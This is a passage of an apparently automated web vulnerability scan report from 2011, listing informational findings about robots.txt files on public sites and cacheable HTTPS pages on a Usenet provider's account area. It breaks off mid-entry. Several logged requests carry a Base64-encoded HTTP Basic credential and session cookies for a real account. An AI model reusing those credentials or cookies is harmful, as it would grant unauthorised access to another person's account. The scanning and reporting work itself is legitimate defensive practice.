The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


27.1. http://api.recaptcha.net/challenge

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.recaptcha.net
Path:   /challenge

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.recaptcha.net

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 14:58:39 GMT
Content-Type: text/plain
Content-Length: 56
Last-Modified: Wed, 02 May 2007 21:27:43 GMT
Connection: close
P3P: CP="NOI ADM DEV PSA PSD UNI COM NAV OUR STP"
Accept-Ranges: bytes

# not on the api sites please
User-agent: *
Disallow: /

27.2. http://clients1.google.com/complete/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clients1.google.com
Path:   /complete/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clients1.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 17 Jan 2011 07:39:39 GMT
Date: Mon, 24 Jan 2011 14:58:41 GMT
Expires: Mon, 24 Jan 2011 14:58:41 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.3. http://demo.joomla.org/plugins/system/jceutilities/css/jceutilities.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://demo.joomla.org
Path:   /plugins/system/jceutilities/css/jceutilities.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: demo.joomla.org

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:51 GMT
Server: Apache/2.2.17 (CentOS)
Last-Modified: Mon, 15 Mar 2010 18:10:08 GMT
ETag: "1d99912-130-481daca8e0000"
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.4. http://filewatcher.org/css/filewatcher.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://filewatcher.org
Path:   /css/filewatcher.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: filewatcher.org

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:54:27 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Fri, 17 Oct 2008 13:19:43 GMT
ETag: "5d4098-9c-45972d182d9c0"
Accept-Ranges: bytes
Content-Length: 156
Cache-Control: max-age=259200
Expires: Thu, 27 Jan 2011 14:54:27 GMT
Vary: Accept-Encoding
Content-Type: text/plain
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
Age: 425
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

User-agent: *
Disallow: /_/
Disallow: /-/

User-agent: Me2di2apartners-Go2ogle*
Disallow: /

User-agent: NPBot*
Disallow: /

User-agent: psbot*
Disallow: /

27.5. http://www.cloudaccess.net/templates/rt_quasar_j15/lib/gantry/css/gantry.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /templates/rt_quasar_j15/lib/gantry/css/gantry.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cloudaccess.net

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:37 GMT
Server: Apache/2.2.17 (CentOS)
Last-Modified: Sat, 05 Dec 2009 13:57:03 GMT
ETag: "1d9993d-130-479fb9953c9c0"
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.6. https://www.cloudaccess.net/my-cloud-panel.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /my-cloud-panel.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cloudaccess.net

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:54:53 GMT
Server: Apache/2.2.17 (CentOS)
Last-Modified: Sat, 05 Dec 2009 13:57:03 GMT
ETag: "1d9993d-130-479fb9953c9c0"
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.7. http://www.microsoft.com/web/media/badge/install_using_webpi_btn.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /web/media/badge/install_using_webpi_btn.png

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/plain
Last-Modified: Tue, 21 Dec 2010 16:13:16 GMT
Accept-Ranges: bytes
ETag: "e213d5f929a1cb1:0"
Server: Microsoft-IIS/7.5
VTag: 438735341900000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 14:58:57 GMT
Connection: keep-alive
Content-Length: 12125

# Robots.txt file for http://www.microsoft.com
#

User-agent: *
Disallow: /*TOCLinksForCrawlers*
Disallow: /*/mac/help.mspx
Disallow: /*/mac/help.mspx?
Disallow: /*/mactopia/help.mspx?
Disallo
...[SNIP]...

27.8. http://www.x64bitdownload.com/templates/X64/css/rating.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /templates/X64/css/rating.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.x64bitdownload.com

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:58:56 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Wed, 14 Oct 2009 09:53:31 GMT
ETag: "14e046e-cd-475e222a2dcc0"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /rss/

User-agent: MSNBot
Disallow: /rss/

User-agent: Slurp
Disallow: /rss/

User-agent: *
Disallow: /write-review.html
Disallow: /saved-software.html
Disallow: /rd.ht
...[SNIP]...

27.9. http://www.youtube.com/subscribe_widget

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /subscribe_widget

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:58:58 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 17:18:00 GMT
ETag: "191-49a3632eac200"
Accept-Ranges: bytes
Content-Length: 401
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /videos
Disallow: /bulletin
Disallow: /comment
Disallow: /forgot
Disallow: /login
Disallow: /results
...[SNIP]...

28. Cacheable HTTPS response
There are 40 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:
  • Cache-control: no-store
  • Pragma: no-cache



28.1. https://acc.newsguy.com/cgi-bin/login_frm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/login_frm

Request

GET /cgi-bin/login_frm HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=BGcaQVM6SsMq0HMk6SquKem4opp0oWW0L4d3d923f;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:52:59 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html

<html>

<head>
<title>Newsguy - Login to Newsguy</title>
<meta NAME="description" CONTENT="Access to Usenet Newsgroups, Email accounts, Web space,
Software, Archives, Art & Music Galleries, Feature co
...[SNIP]...

28.2. https://acc.newsguy.com/cgi-bin/ngexpress_form

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/ngexpress_form

Request

GET /cgi-bin/ngexpress_form HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:31 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html


<head>
<title>Newsguy - Open a Newsguy Express Account</title>
<meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space,
software, archives, art & music galleries, fea
...[SNIP]...

28.3. https://acc.newsguy.com/cgi-bin/sub_form

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/sub_form

Request

GET /cgi-bin/sub_form HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:31 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html


<head>
<title>Newsguy - Open a Newsgroup Account</title>
<meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space,
software, archives, art & music galleries, feature c
...[SNIP]...

28.4. https://acc.newsguy.com/cgi-bin/sub_spot_form

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/sub_spot_form

Request

GET /cgi-bin/sub_spot_form HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:32 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD><TITLE>Newsguy - Open a Spot Account</TITLE>
<style>
a {
text-decoration: none;
}

a:link, a:visited, a:active {
text-decor
...[SNIP]...

28.5. https://acc.newsguy.com/cgi-bin/sub_trial_form

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/sub_trial_form

Request

GET /cgi-bin/sub_trial_form HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:33 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD><TITLE>Newsguy - Open a Free 14 Day Trial Account</TITLE>
<style>
a {
text-decoration: none;
}

a:link, a:visited, a:active
...[SNIP]...

28.6. https://acc.newsguy.com/cgi-bin/sub_unlmt_form

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/sub_unlmt_form

Request

GET /cgi-bin/sub_unlmt_form HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:30 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html


<head>
<title>Newsguy - Open a Newsgroup Account</title>
<meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space,
software, archives, art & music galleries, feature c
...[SNIP]...

28.7. https://acc.newsguy.com/cgi-bin/usenetports

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/usenetports

Request

GET /cgi-bin/usenetports HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:28 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html

<html>
<head>
<title>Newsguy - Usenet Ports - Comprehensive Outsourcing Solutions - Signup</title>
<script language="JavaScript">
function calculate()
{
   var justnumber = /^[1-9][0-9]*$/;
   var justnu
...[SNIP]...

28.8. https://acc.newsguy.com/lotto_bonuspicks.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /lotto_bonuspicks.htm

Request

GET /lotto_bonuspicks.htm HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=BGcaQVM6SsMq0HMk6SquKem4opp0oWW0L4d3d923f;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:53:19 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Last-Modified: Thu, 07 Oct 2004 07:06:01 GMT
ETag: "20bdfd-3500-4164ead9"
Accept-Ranges: bytes
Content-Length: 13568
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Newsguy Lotto! Weekly Winners!</title>
<meta NAME="description" CONTENT="Automatically read, post, decode and track newsg
...[SNIP]...

28.9. https://acc.newsguy.com/lotto_details.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /lotto_details.htm

Request

GET /lotto_details.htm HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=BGcaQVM6SsMq0HMk6SquKem4opp0oWW0L4d3d923f;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:53:18 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Last-Modified: Thu, 07 Oct 2004 07:06:01 GMT
ETag: "20be15-3646-4164ead9"
Accept-Ranges: bytes
Content-Length: 13894
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Newsguy Lotto! Weekly Winners!</title>
<meta NAME="description" CONTENT="Automatically read, post, decode and track newsg
...[SNIP]...

28.10. https://acc.newsguy.com/requestid.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /requestid.htm

Request

GET /requestid.htm HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:46 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Last-Modified: Thu, 07 Oct 2004 07:06:01 GMT
ETag: "20be18-be9-4164ead9"
Accept-Ranges: bytes
Content-Length: 3049
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Login / ID Lookup</title>
<meta NAME="description" CONTENT="ID Lookup for Newsguy, a leading provider of
newsgroup access
...[SNIP]...

28.11. https://acc.newsguy.com/user/-/accnt_billing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_billing

Request

GET /user/-/accnt_billing HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/customer_referrals
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:37 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 22337

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Billing Details</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmar
...[SNIP]...

28.12. https://acc.newsguy.com/user/-/accnt_contact

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_contact

Request

GET /user/-/accnt_contact HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_billing
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 8709

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Contact Details</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmar
...[SNIP]...

28.13. https://acc.newsguy.com/user/-/accnt_flash

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_flash

Request

GET /user/-/accnt_flash HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:13 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 11585

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Flash Report</TITLE>
<script src="/accnt_forms.js"></script>
<script src="/accnt_ref.js"></script>
<script src="/lotto.js"></script>
</HEAD>

<bo
...[SNIP]...

28.14. https://acc.newsguy.com/user/-/accnt_history

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_history

Request

GET /user/-/accnt_history HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_contact
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:44 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=V7YlZkC_LNm7StDUl.fCuemaopp0oWW0L4d3d923c; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 5814

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Purchase History</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftma
...[SNIP]...

28.15. https://acc.newsguy.com/user/-/customer_referrals

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/customer_referrals

Request

GET /user/-/customer_referrals HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_flash
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:29 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 17318

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Referral Credits</TITLE>
<script src="/referrals.js"></script>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#265
...[SNIP]...

28.16. https://acc.newsguy.com/user/-/referrals_cashout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/referrals_cashout

Request

GET /user/-/referrals_cashout HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_flash
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=obHFXmnhMbJX5LfJRNZRWemqopp0oWW0L4d3d924f

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:53:10 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 3297

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Account Administration - CashOut! Referral Credits</title>
<meta NAME="description" CONTENT="Automatically read, post, de
...[SNIP]...

28.17. https://acc.newsguy.com/user/accnt_overview

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_overview

Request

GET /user/accnt_overview HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:35 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=.NtkeVYzZQxxA.BCeif7Dem4opp0oWW0L4d3d944f; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Account Overview</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftma
...[SNIP]...

28.18. https://acc.newsguy.com/user/accnt_renew

Summary

Severity:   Information
Confidence:   Certain
